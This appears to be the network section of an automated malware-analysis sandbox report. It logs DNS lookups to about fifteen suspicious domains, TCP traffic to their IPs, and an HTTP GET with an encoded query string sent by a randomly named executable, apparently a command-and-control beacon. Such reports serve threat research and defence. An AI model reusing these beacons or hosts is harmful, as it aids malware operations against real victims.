                                                                                    Dec 19, 2024 06:43:40.437346935 CET4997880192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:41.457856894 CET4998480192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:41.578145981 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:41.578227997 CET4998480192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:41.581525087 CET4998480192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:41.701195002 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:41.701252937 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:41.701349974 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:41.701378107 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:41.701427937 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:41.701455116 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:41.701486111 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:41.701590061 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:41.701621056 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:42.856229067 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:42.951734066 CET804998491.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:42.951800108 CET4998480192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:43.093502998 CET4998480192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:44.112740993 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:44.232728004 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:44.232945919 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:44.236732960 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:44.356515884 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.539918900 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540066004 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540098906 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540136099 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540169954 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.540201902 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.540241957 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540294886 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540329933 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540354967 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.540389061 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540433884 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540462971 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.540494919 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.540595055 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.660181999 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.660264969 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.660373926 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.664271116 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.732234955 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.732312918 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.732400894 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.736391068 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.736454010 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.736499071 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.744796991 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.744849920 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.744877100 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.753200054 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.753271103 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.753334045 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:43:45.753422022 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.755655050 CET4999080192.168.2.491.195.240.94
                                                                                    Dec 19, 2024 06:43:45.875139952 CET804999091.195.240.94192.168.2.4
                                                                                    Dec 19, 2024 06:44:04.487364054 CET5001680192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:04.607039928 CET805001666.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:04.607119083 CET5001680192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:04.608711004 CET5001680192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:04.728337049 CET805001666.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:05.842195988 CET805001666.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:05.842289925 CET805001666.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:05.842333078 CET5001680192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:06.127013922 CET5001680192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:07.143462896 CET5001780192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:07.263487101 CET805001766.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:07.263585091 CET5001780192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:07.265283108 CET5001780192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:07.384964943 CET805001766.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:08.506069899 CET805001766.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:08.506120920 CET805001766.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:08.509903908 CET5001780192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:08.782841921 CET5001780192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:09.799341917 CET5001880192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:09.919529915 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:09.919608116 CET5001880192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:09.921848059 CET5001880192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:10.041598082 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:10.041634083 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:10.041706085 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:10.041735888 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:10.041764021 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:10.041791916 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:10.041843891 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:10.041872978 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:10.041904926 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:11.162903070 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:11.162955999 CET805001866.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:11.163005114 CET5001880192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:11.437364101 CET5001880192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:12.456844091 CET5001980192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:12.576706886 CET805001966.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:12.576987028 CET5001980192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:12.580826998 CET5001980192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:12.700769901 CET805001966.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:13.816999912 CET805001966.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:13.817173958 CET805001966.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:13.817243099 CET5001980192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:13.843477011 CET5001980192.168.2.466.29.149.46
                                                                                    Dec 19, 2024 06:44:13.963126898 CET805001966.29.149.46192.168.2.4
                                                                                    Dec 19, 2024 06:44:19.684750080 CET5002080192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:19.804474115 CET8050020195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:19.804604053 CET5002080192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:19.806196928 CET5002080192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:19.926412106 CET8050020195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:21.115406990 CET8050020195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:21.115462065 CET8050020195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:21.115533113 CET5002080192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:21.312436104 CET5002080192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:22.330900908 CET5002180192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:22.451342106 CET8050021195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:22.459888935 CET5002180192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:22.492876053 CET5002180192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:22.612751007 CET8050021195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:23.770736933 CET8050021195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:23.770808935 CET8050021195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:23.770863056 CET5002180192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:23.999979973 CET5002180192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:25.018908024 CET5002280192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:25.139020920 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:25.139110088 CET5002280192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:25.141993046 CET5002280192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:25.261754990 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:25.261835098 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:25.261890888 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:25.261919975 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:25.261970043 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:25.261996984 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:25.262049913 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:25.262100935 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:25.262131929 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:26.557471037 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:26.557594061 CET8050022195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:26.557930946 CET5002280192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:26.657125950 CET5002280192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:27.675704002 CET5002380192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:27.795595884 CET8050023195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:27.795681953 CET5002380192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:27.802997112 CET5002380192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:27.922740936 CET8050023195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:29.103414059 CET8050023195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:29.103625059 CET8050023195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:29.103689909 CET5002380192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:29.106513023 CET5002380192.168.2.4195.110.124.133
                                                                                    Dec 19, 2024 06:44:29.227163076 CET8050023195.110.124.133192.168.2.4
                                                                                    Dec 19, 2024 06:44:51.192821980 CET5002480192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:51.312458038 CET8050024217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:51.312531948 CET5002480192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:51.314981937 CET5002480192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:51.435018063 CET8050024217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:52.526334047 CET8050024217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:52.526386023 CET8050024217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:52.526515961 CET5002480192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:52.831370115 CET5002480192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:53.847563982 CET5002580192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:53.967984915 CET8050025217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:53.968077898 CET5002580192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:53.975780964 CET5002580192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:54.097830057 CET8050025217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:55.171449900 CET8050025217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:55.172704935 CET8050025217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:55.172768116 CET5002580192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:55.485337973 CET5002580192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:56.503164053 CET5002680192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:56.623157024 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:56.623306036 CET5002680192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:56.626153946 CET5002680192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:56.745852947 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:56.745925903 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:56.746062994 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:56.746092081 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:56.746150970 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:56.746179104 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:56.746227980 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:56.746256113 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:56.746284962 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:57.824526072 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:57.825272083 CET8050026217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:57.825335026 CET5002680192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:58.182735920 CET5002680192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:59.190984011 CET5002780192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:59.310936928 CET8050027217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:44:59.311014891 CET5002780192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:59.312730074 CET5002780192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:44:59.432288885 CET8050027217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:45:00.511495113 CET8050027217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:45:00.511770964 CET8050027217.196.55.202192.168.2.4
                                                                                    Dec 19, 2024 06:45:00.511950016 CET5002780192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:45:00.525259018 CET5002780192.168.2.4217.196.55.202
                                                                                    Dec 19, 2024 06:45:00.644821882 CET8050027217.196.55.202192.168.2.4
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 19, 2024 06:41:30.918642998 CET5841653192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:41:31.640964031 CET53584161.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:41:48.392819881 CET5289553192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:41:48.795186996 CET53528951.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:41:56.878171921 CET6086153192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:41:57.594636917 CET53608611.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:42:12.284260035 CET6526053192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:42:12.528875113 CET53652601.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:42:20.581357956 CET6294853192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:42:21.315728903 CET53629481.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:43:35.806225061 CET6503653192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:43:36.143209934 CET53650361.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:43:55.786669970 CET5427253192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:43:55.970388889 CET53542721.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:44:04.060404062 CET5356053192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:44:04.484462023 CET53535601.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:44:18.847378016 CET6285453192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:44:19.682374954 CET53628541.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:44:34.115370035 CET5425353192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:44:34.300966024 CET53542531.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:44:42.362977982 CET5461653192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:44:42.603862047 CET53546161.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:44:50.675554037 CET6377953192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:44:51.189831018 CET53637791.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:45:05.535403967 CET6515853192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:45:05.758460999 CET53651581.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:45:10.095670938 CET6194353192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:45:10.235990047 CET53619431.1.1.1192.168.2.4
                                                                                    Dec 19, 2024 06:45:15.252773046 CET5561353192.168.2.41.1.1.1
                                                                                    Dec 19, 2024 06:45:15.478022099 CET53556131.1.1.1192.168.2.4
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 19, 2024 06:41:30.918642998 CET192.168.2.41.1.1.10x2511Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:41:48.392819881 CET192.168.2.41.1.1.10xb33eStandard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:41:56.878171921 CET192.168.2.41.1.1.10x30f0Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:42:12.284260035 CET192.168.2.41.1.1.10x9146Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:42:20.581357956 CET192.168.2.41.1.1.10xb725Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:43:35.806225061 CET192.168.2.41.1.1.10xe815Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:43:55.786669970 CET192.168.2.41.1.1.10x2322Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:04.060404062 CET192.168.2.41.1.1.10x22ebStandard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:18.847378016 CET192.168.2.41.1.1.10x4925Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:34.115370035 CET192.168.2.41.1.1.10x7bbaStandard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:42.362977982 CET192.168.2.41.1.1.10x2d50Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:50.675554037 CET192.168.2.41.1.1.10x24a5Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:45:05.535403967 CET192.168.2.41.1.1.10x8ea2Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:45:10.095670938 CET192.168.2.41.1.1.10xaeccStandard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:45:15.252773046 CET192.168.2.41.1.1.10xfcf0Standard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 19, 2024 06:41:31.640964031 CET1.1.1.1192.168.2.40x2511No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:41:48.795186996 CET1.1.1.1192.168.2.40xb33eName error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:41:57.594636917 CET1.1.1.1192.168.2.40x30f0No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:42:12.528875113 CET1.1.1.1192.168.2.40x9146Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:42:21.315728903 CET1.1.1.1192.168.2.40xb725No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 19, 2024 06:42:21.315728903 CET1.1.1.1192.168.2.40xb725No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 19, 2024 06:42:21.315728903 CET1.1.1.1192.168.2.40xb725No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:43:36.143209934 CET1.1.1.1192.168.2.40xe815No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:43:55.970388889 CET1.1.1.1192.168.2.40x2322Name error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:04.484462023 CET1.1.1.1192.168.2.40x22ebNo error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:19.682374954 CET1.1.1.1192.168.2.40x4925No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:19.682374954 CET1.1.1.1192.168.2.40x4925No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:34.300966024 CET1.1.1.1192.168.2.40x7bbaName error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:42.603862047 CET1.1.1.1192.168.2.40x2d50Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:51.189831018 CET1.1.1.1192.168.2.40x24a5No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 19, 2024 06:44:51.189831018 CET1.1.1.1192.168.2.40x24a5No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:45:05.758460999 CET1.1.1.1192.168.2.40x8ea2Name error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:45:10.235990047 CET1.1.1.1192.168.2.40xaeccName error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 06:45:15.478022099 CET1.1.1.1192.168.2.40xfcf0Name error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                    • www.3xfootball.com
                                                                                    • www.goldenjade-travel.com
                                                                                    • www.magmadokum.com
                                                                                    • www.rssnewscast.com
                                                                                    • www.techchains.info
                                                                                    • www.elettrosistemista.zip
                                                                                    • www.empowermedeco.com
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449736154.215.72.110803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:41:31.769866943 CET505OUTGET /fo8o/?K8tpX=HvRPZ2CX3&Sj=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.3xfootball.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Dec 19, 2024 06:41:33.316937923 CET691INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Thu, 19 Dec 2024 05:41:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 548
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
